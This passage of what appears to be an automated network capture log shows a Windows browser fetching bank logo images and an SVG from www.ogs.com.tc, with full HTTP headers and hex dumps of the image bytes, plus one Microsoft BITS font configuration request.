2024-05-25 22:17:16 UTC	16384	IN	Data Raw: 38 e2 82 e2 84 ca 12 5d d0 f0 61 11 3d d1 b6 9a d8 98 9e d4 a7 48 d1 b5 eb d4 27 b2 ea 80 12 5b 60 90 08 82 4c cd 8e e4 c8 ba 5c 0a 02 92 97 00 24 ff 00 ca ed 76 2c 21 85 f1 ce 51 5f 1d 4c f2 e3 db 84 6a aa 3a 17 99 40 d3 98 15 4a 6f 44 a2 b6 e9 fe 25 c1 d6 a0 68 69 9c 96 dd d9 36 6b cb f7 a0 ee 1e db 09 5f 59 db a3 89 05 f2 2f 2d 7a ce d9 a9 cd 08 14 71 27 64 59 b4 5f 1a 0e 45 02 1e e8 cb cc 68 85 a9 14 c6 12 da 9b f3 c8 5b 55 4e 02 95 52 b4 aa 20 5d 5e 85 d4 8f 25 75 66 91 a3 11 ea bf 3c 04 f4 ea 6b 12 bd a9 72 ad 15 d7 1f 44 7d 21 2a 0e 55 23 13 b7 96 3f ef 6e e5 cb 37 07 66 62 16 aa 1b a6 60 d5 94 dd 34 8f 1d 68 a1 d6 28 4d 52 b9 4c 11 0d 0f 73 a5 3f b1 f0 95 ec 91 46 dc f1 c7 3c 3c 62 99 cd 08 5e b1 22 5b 7c 3a b7 82 b2 0d a6 9f ed ea 53 ae 3a f6 29 Data Ascii: 8]a=H'[`L\$v,!Q_Lj:@JoD%hi6k_Y/-zq'dY_Eh[UNR ]^%uf<krD}!*U#?n7fb`4h(MRLs?F<<b^"[\|:S:)
2024-05-25 22:17:16 UTC	16384	IN	Data Raw: 98 64 47 44 62 bd d0 bb 66 4b d0 ea 7b c1 ea 49 62 c4 72 43 29 af f0 d3 a5 81 fe 1e 1a 32 91 47 61 91 51 d4 99 51 62 0a 90 64 50 07 1a 7e 87 b5 f4 98 6b b8 a9 4a 93 4a 42 0b 36 93 4f 80 57 ab f1 32 00 a6 79 21 87 11 8e 03 28 66 38 00 78 ed 6e fd db 75 d6 c7 62 f5 2d 52 ee 8f ac 4f 24 44 be 9b 6a 0b 8d 5a 1d 40 c9 16 67 8a bb b2 b0 26 40 6b 98 d5 7a 9d 39 24 46 0d 0d 86 db d6 bb 49 62 91 86 c5 69 a3 9d b5 13 33 29 0f 26 72 b2 54 b1 04 84 f4 cd 77 ca 86 13 9b 13 20 c5 ad 5e 8f 6c b6 99 b7 7e 25 4b c1 a6 69 f2 c9 84 b2 80 bd 5f 84 a9 19 2a b9 57 19 65 08 a3 05 05 8b 39 50 da 78 de 5b 72 b6 a7 45 e1 0f 56 c8 0f 0d 98 e3 90 66 56 86 70 23 9e 35 6c 43 18 9f dc 27 0e a4 58 8c 38 36 e4 d4 77 14 95 0b 72 88 d9 80 27 ac 8c eb 50 39 c0 7f 2b 11 e6 4f 1b bf 44 d3 36 Data Ascii: dGDbfK{IbrC)2GaQQbdP~kJJB6OW2y!(f8xnub-RO$DjZ@g&@kz9$FIbi3)&rTw ^l~%Ki_*We9Px[rEVfVp#5lC'X86wr'P9+OD6
2024-05-25 22:17:16 UTC	3144	IN	Data Raw: ab 48 b5 50 f1 bc 37 a1 7e 4e f9 46 60 3f 32 d9 df 67 a6 e6 f0 59 e8 af 7b 9a 8b 61 a5 da dc 40 81 1d 3c 7e 66 92 df d5 e2 bf 1e db fb 3d b3 cc 2a 8e 4b de 79 0f 4b b6 78 18 f2 9d b5 58 6e 81 9f d3 d8 fa 43 1b 5c 42 91 61 56 3d 11 ad 45 57 2f c9 13 e7 f1 57 7d 43 67 5f 75 47 77 5d 0a de 9a e6 a6 64 7b 1a bb 6a 9b 28 c2 9b 5d 67 5b 61 10 86 8b 3a be 7c 33 30 a1 30 9e e1 94 6f 47 35 55 15 17 ee b2 c6 97 f2 5c 27 bb 0e 67 4f 31 bc 6b ab 49 03 83 12 de 1a 10 d6 05 e5 7d 24 d0 c2 59 96 18 2b b9 a5 23 e2 c8 46 1a 4e 7e c0 ee 99 15 84 11 67 c3 9d b6 e3 5d 8f 19 77 cf 7a 77 3a be 97 9a d9 63 f4 31 db 1e ce 9a da 27 95 ca d5 70 88 68 93 a0 4d 8c 51 c9 87 32 31 4d 0e 7c 33 0a 4c 62 94 05 19 1d ae fd ed 3a b7 f7 07 8f fd bb 7f 6f fd f3 1b 0b 6f cd 37 d5 ae 83 6d 59 Data Ascii: HP7~NF`?2gY{a@<~f=*KyKxXnC\BaV=EW/W}Cg_uGw]d{j(]g[a:\|300oG5U\'gO1kI}$Y+#FN~g]wzw:c1'phMQ21M\|3Lb:oo7mY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49751	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:16 UTC	603	OUT	GET /assets/images/banks/kuveyt.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:16 UTC	282	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:16 GMT Content-Type: image/jpeg Content-Length: 4050 Last-Modified: Thu, 23 May 2024 21:37:17 GMT Connection: close ETag: "664fb70d-fd2" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:16 UTC	4050	IN	Data Raw: 52 49 46 46 ca 0f 00 00 57 45 42 50 56 50 38 20 be 0f 00 00 f0 55 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 21 95 18 f0 50 09 09 65 6e e1 76 b1 1f d4 dd 7d 13 97 b5 7e 5a 7b 2a 55 3f a9 fe 10 f4 00 fb 00 e9 17 a1 3c b5 bc 4b f3 0f f3 5f dc 3f 28 fe 80 7f 6e fe 81 ec 93 f3 1f ea 4f c0 17 e9 47 f8 ef ee 9e b6 9e a5 3c c0 7f 39 fe cf ff 17 fc 77 ba d7 f8 af d4 df 71 7f b2 1e c0 1f d1 7f c1 ff da f5 8a f6 11 ff 01 ff 5b d8 03 f6 3b ff ff b2 af fb 6f d9 6f 82 6f da bf db 9f 81 1f e7 5f e0 3f ea 7e 7f f7 00 75 13 f4 6b fb 97 6a 3f db ff 24 fa e5 7c d5 ec 67 30 27 a2 fa ef f9 df cc af 61 ff c2 fe 45 79 bf c0 0b d5 ff e0 b7 b4 40 07 e4 ff cf bf d7 7d aa fa 38 7f 2b e8 77 88 07 ea ef fa 7e 35 af 42 f6 03 fe 6f fd cb f5 bb d8 63 fc 9f 2d 7f 4f fe cd fc 09 Data Ascii: RIFFWEBPVP8 U>I$F"!!Penv}~Z{U?<K_?(nOG<9wq[;ooo_?~ukj?$\|g0'aEy@}8+w~5Boc-O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49753	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:16 UTC	600	OUT	GET /assets/images/banks/teb.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:16 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:16 GMT Content-Type: image/jpeg Content-Length: 22502 Last-Modified: Thu, 23 May 2024 21:37:19 GMT Connection: close ETag: "664fb70f-57e6" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:16 UTC	16100	IN	Data Raw: ff d8 ff e1 07 53 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 32 37 20 31 39 3a 35 39 3a 35 38 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: SExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:09:27 19:59:58"
2024-05-25 22:17:16 UTC	6402	IN	Data Raw: dc 48 ed 8a 1c b2 b7 94 69 b9 7b 9a f0 86 c5 6a 8a ea 19 78 aa c5 1f e2 5d 2a 76 8b c4 b5 4b 6d 78 29 93 30 94 bc ab 12 39 a9 1c 8f 4a a7 b9 99 74 aa 43 41 2a c0 b0 16 42 5d 5b 46 ff 00 15 0d 15 a9 a0 3b c5 c0 90 90 55 20 6a 29 b3 0a 75 35 56 85 a8 29 2a 4e 12 95 24 90 53 84 ca 58 48 29 29 fc 24 61 20 11 28 be 28 b2 8c ae 9d 6f 66 15 0e 25 b6 d0 80 54 a5 29 6a 09 48 00 5a 49 51 01 20 5a a5 10 91 69 11 cc 34 39 9b ac 35 93 e5 25 29 ab ad 2a 22 99 b7 0a 12 a2 ca 16 a4 85 3a f9 51 08 6d 96 d0 a7 56 48 5a 5b 2d 85 29 2e 21 87 71 b4 09 00 ca 53 1a e5 33 da 7a 89 16 c5 f1 7c 5f 19 4b c0 da 9a 86 cf f7 d3 1c 9e e6 ba 34 fe d2 ba 4b 9c de fd 11 49 fc f5 30 8c c1 33 ff 00 19 67 7a 89 80 a0 7f 3e b0 75 83 71 1a 44 72 c5 0e 59 cd b5 14 1f 31 72 4c c1 b6 96 a6 dd 52 Data Ascii: Hi{jx]vKmx)09JtCAB][F;U j)u5V)N$SXH))$a ((of%T)jHZIQ Zi495%)":QmVHZ[-).!qS3z\|_K4KI03gz>uqDrY1rLR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49754	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:16 UTC	606	OUT	GET /assets/images/banks/sekerbank.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:16 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:16 GMT Content-Type: image/jpeg Content-Length: 30853 Last-Modified: Thu, 23 May 2024 21:37:18 GMT Connection: close ETag: "664fb70e-7885" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:16 UTC	16100	IN	Data Raw: ff d8 ff e1 09 6f 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 38 3a 30 35 3a 34 31 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: oExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 18:05:41"
2024-05-25 22:17:16 UTC	14753	IN	Data Raw: 79 7e 33 4e 00 62 ad ed 7a ba bd ce 9c 87 af e4 a7 a7 af 05 88 cf e2 1c 3e 5f 3f b8 28 78 63 da 3e 8c 7b 47 d1 8f 68 fa 30 0e ac c7 be 32 f6 7d 58 43 4c c9 a7 a2 bf 17 9a a7 0e 7a f1 c1 4f 9b 19 01 f0 60 93 83 e5 3e bc 32 f0 3f 2f 4f 87 8b 04 74 83 43 eb f0 f9 6b 81 e3 a1 f8 b0 72 19 75 79 fe 3c 7b 23 e0 c2 93 d0 6b e8 23 e3 f7 1b c7 5c 4b f8 a7 03 a8 f8 7a fd c6 c5 7c 67 d6 70 2a d9 f8 86 2a 46 43 ac fb a4 f5 7b 8b e5 18 8f f1 d7 d6 31 c2 bd 3e 1d 7e 2c 07 39 a8 cf ee fc 1e 8c 50 f1 f7 0f 1a e5 d0 71 52 33 f2 1c 7b 3e 83 8f 67 d0 71 ec fa 0e 3d 9f 41 c7 b3 e8 38 ae 9f 7b 75 d7 1c 30 09 14 03 19 70 1e 1e 8f b9 82 3c 79 f9 fa 7e 5f 87 14 e2 bd 1f 26 38 1c 54 8a 66 7d 78 3e 53 eb c0 23 88 f5 74 fc b8 12 2f 1a 7c 23 ee 56 a3 ce 3a 70 ac 33 15 f4 1f 93 8e 2a Data Ascii: y~3Nbz>_?(xc>{Gh02}XCLzO`>2?/OtCkruy<{#k#\Kz\|gp*FC{1>~,9PqR3{>gq=A8{u0p<y~_&8Tf}x>S#t/\|#V:p3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49755	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:16 UTC	617	OUT	GET /assets/images/edkkds.svg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/assets/css/style.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:16 UTC	286	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:16 GMT Content-Type: image/svg+xml Content-Length: 8746 Last-Modified: Thu, 23 May 2024 21:37:21 GMT Connection: close ETag: "664fb711-222a" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:16 UTC	8746	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 37 32 2e 35 20 31 30 30 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 45 36 45 36 45 36 22 20 64 3d 22 4d 38 36 2e 31 20 32 36 2e 34 63 2d 2e 31 2d 31 2d 2e 39 2d 32 2d 32 2d 32 2e 33 6c 2d 33 38 2e 33 2d 31 33 63 2d 2e 36 2d 2e 32 2d 31 2e 34 2d 2e 32 2d 32 2e 31 20 30 6c 2d 33 38 2e 34 20 31 33 63 2d 31 20 2e 33 2d 31 2e 39 20 31 2e 32 2d 32 20 32 2e 33 43 2e 36 20 35 32 2e 35 20 35 20 37 32 2e 33 20 31 36 2e 38 20 38 35 2e 35 20 32 38 2e 39 20 39 38 2e 37 20 34 34 20 39 39 2e 38 20 34 34 2e 37 20 39 39 2e 38 68 2e 34 63 2e 36 20 30 20 31 35 2e 38 2d 31 20 32 37 2e 38 2d 31 34 2e 33 43 38 34 2e Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 672.5 100"><path fill="#E6E6E6" d="M86.1 26.4c-.1-1-.9-2-2-2.3l-38.3-13c-.6-.2-1.4-.2-2.1 0l-38.4 13c-1 .3-1.9 1.2-2 2.3C.6 52.5 5 72.3 16.8 85.5 28.9 98.7 44 99.8 44.7 99.8h.4c.6 0 15.8-1 27.8-14.3C84.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49757	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:16 UTC	600	OUT	GET /assets/images/banks/ptt.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:17 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:16 GMT Content-Type: image/jpeg Content-Length: 5260 Last-Modified: Thu, 23 May 2024 21:37:18 GMT Connection: close ETag: "664fb70e-148c" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:17 UTC	5260	IN	Data Raw: 52 49 46 46 84 14 00 00 57 45 42 50 56 50 38 20 78 14 00 00 30 5f 00 9d 01 2a f4 01 c8 00 3e 49 24 90 45 a2 a2 21 91 79 e4 70 28 04 84 b1 b7 70 bb 55 fe 57 da fb 4a b2 b7 63 fc 8e fc b5 f9 6d a9 ff 55 fc 5d fd 2f f6 93 9d 8e b2 f2 ae f1 af cb ff d0 ff 6d fd cd ff 0d ff ff ff ff df af f3 3f db bd 86 7e 8e ff 2d ee 01 fa 67 fe 5f fa ef f8 ef f7 3f bf ff 30 1e a2 ff 73 3d 40 7f 3c fe f5 ff 87 fc 7f bb 1f f6 bf d2 df 72 1f b3 bf f0 3f c0 7c 00 7f 47 fe ed e9 6f ec 2d fb 93 ec 0d fc fb fc 2f fe 5f 5c af fc 5f ec be 0f 7f ac 7f a7 fd a4 f8 1b fe 85 fd a7 fe 7f e7 bf c8 07 ff ff 6c ce 91 7e a1 ff 76 ed 4f fb 5f da d7 65 c7 a7 7d be e5 1f d4 7e 65 7f 21 fb 4f f9 bf ef 5f b8 9f 95 ff 25 f7 b3 f1 4b fb df 50 8f c6 ff 95 7f 91 fe c1 fb 8d c2 eb 67 fd 02 3d da fa 4f Data Ascii: RIFFWEBPVP8 x0_*>I$E!yp(pUWJcmU]/m?~-g_?0s=@<r?\|Go-/_\_l~vO_e}~e!O_%KPg=O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49758	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:16 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-25 22:17:17 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=64313 Date: Sat, 25 May 2024 22:17:17 GMT Content-Length: 55 Connection: close X-CID: 2
2024-05-25 22:17:17 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49759	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:17 UTC	600	OUT	GET /assets/images/banks/ykb.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:17 UTC	282	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:17 GMT Content-Type: image/jpeg Content-Length: 4042 Last-Modified: Thu, 23 May 2024 21:37:20 GMT Connection: close ETag: "664fb710-fca" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:17 UTC	4042	IN	Data Raw: 52 49 46 46 c2 0f 00 00 57 45 42 50 56 50 38 20 b6 0f 00 00 b0 58 00 9d 01 2a f4 01 c8 00 3e 49 24 91 45 a2 a2 21 92 1a 14 48 28 04 84 b3 b7 70 bb 58 8d 80 03 b1 ea 72 f9 7f 37 7b 6f f7 fd bd ca 73 ca f7 8b 7f d5 7f 51 fc 99 f9 e5 fd c7 fc 97 b3 6f 30 0f d7 5e 90 9e 60 3f 5f 7f 65 fd d5 7f bb 7e be fb 8e fd 8f fd 77 f8 00 fe 75 fd f3 d6 0b d4 e3 fb bf fc ef 60 7f e5 bf ed 3d 36 7f 74 be 17 ff af ff c8 fd bc f6 b8 cd 3d fe eb da af f9 1f c9 4e c8 3f 74 7b 53 cb f5 e9 7e d2 7e 77 fb b7 ed ef c6 df e4 3b d1 e0 11 eb 8f f3 9f 93 5f 96 5c 73 20 03 eb 47 fa 7f 10 0d 54 32 00 fe 69 fd 27 fe 27 1f 6d 01 3f 96 ff 72 ff c9 fe 2f d9 5f ea 9f 43 7f 51 ff ec ff 33 f0 2d fa e7 ff 4f fb cf 6a cf 45 01 4b e7 7e 7d c1 7b 82 f7 05 ee 0b dc 17 b8 2f 70 5e e0 bd c1 7b 82 f7 Data Ascii: RIFFWEBPVP8 X*>I$E!H(pXr7{osQo0^`?_e~wu`=6t=N?t{S~~w;_\s GT2i''m?r/_CQ3-OjEK~}{/p^{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49760	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:17 UTC	602	OUT	GET /assets/images/banks/vakif.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:17 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:17 GMT Content-Type: image/jpeg Content-Length: 4414 Last-Modified: Thu, 23 May 2024 21:37:20 GMT Connection: close ETag: "664fb710-113e" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:17 UTC	4414	IN	Data Raw: 52 49 46 46 36 11 00 00 57 45 42 50 56 50 38 20 2a 11 00 00 90 5b 00 9d 01 2a f4 01 c8 00 3e 49 24 8f 46 22 a2 21 21 22 32 48 d8 50 09 09 69 6e e1 77 61 1f c8 1a 5c 7d 4b f2 1f f2 03 9e d7 69 3b ef be f8 5d 3a 8c fb ef e4 97 fa ae d0 1e 60 1f a4 1f e6 7a 91 79 80 fe 53 fd 4f fd c7 f7 2f 7c 7f 40 1e 80 1f aa 3d 60 1f a8 1e c1 1f b4 7e 98 1f b7 3f 05 df b3 7f b5 ff 01 7f ca 7f b0 6a ab f9 97 fb 37 64 bf d2 ff a3 fe b8 7f 5c ec 3a ef 37 ad 9c ad e2 83 f1 0f a9 bf 6b fe bf fb 25 fd bf f7 4b e2 8f ea 5f 91 1f 8d de cd f0 02 fc 47 f8 ef f6 0f cb 5f c8 fe 34 c0 01 fa 5f f5 6f f0 ff 99 1f d8 fd 07 3f 6c f4 27 ec a7 fb bf 70 0f e5 1f cd bf cc 7e 67 fa c7 7f 20 f1 6f a0 07 f1 8f ec 1f ea 7e f7 7e 37 3f d1 ff 43 fe 3b f7 33 db bf cf 7f f1 ff c6 7f 99 f9 0c fe 5d fd Data Ascii: RIFF6WEBPVP8 [>I$F"!!"2HPinwa\}Ki;]:`zySO/\|@=`~?j7d\:7k%K_G_4_o?l'p~g o~~7?C;3]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49761	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:17 UTC	601	OUT	GET /assets/images/banks/odea.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:17 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:17 GMT Content-Type: image/jpeg Content-Length: 24936 Last-Modified: Thu, 23 May 2024 21:37:17 GMT Connection: close ETag: "664fb70d-6168" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
